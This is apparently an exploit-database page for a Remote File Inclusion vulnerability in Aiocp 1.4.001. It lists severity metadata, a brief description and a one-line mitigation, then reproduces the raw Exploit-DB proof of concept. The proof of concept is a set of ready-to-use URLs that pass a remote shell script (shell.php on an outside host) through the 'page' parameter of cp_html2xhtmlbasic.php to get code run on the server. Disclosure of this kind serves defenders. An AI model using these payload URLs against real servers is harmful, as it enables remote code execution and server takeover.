header-logo
Suggest Exploit
vendor:
Aiocp
by:
Hadi Kiamarsi
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Aiocp
Affected Version From: 1.4.2001
Affected Version To: 1.4.2001
Patch Exists: NO
Related CWE: N/A
CPE: a:aiocp:aiocp:1.4.001
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Aiocp 1.4.001 Remote File Inclusion vulnerability

Aiocp 1.4.001 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.
Source

Exploit-DB raw data:

###########################################

#

# Aiocp 1.4.001 Remote File Inclusion vulnerability

#

# Found by : Hadi Kiamarsi

#

# Contact : hadikiamarsi [at] hotmail.com

#

# Download : http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download

#

###########################################

PoC :

http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=[SHELL]

example :

http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=http://www.example.com/shell.php

local Example :

http://localhost/root/public/code/cp_html2xhtmlbasic.php?page=http://127.0.0.1/shell.php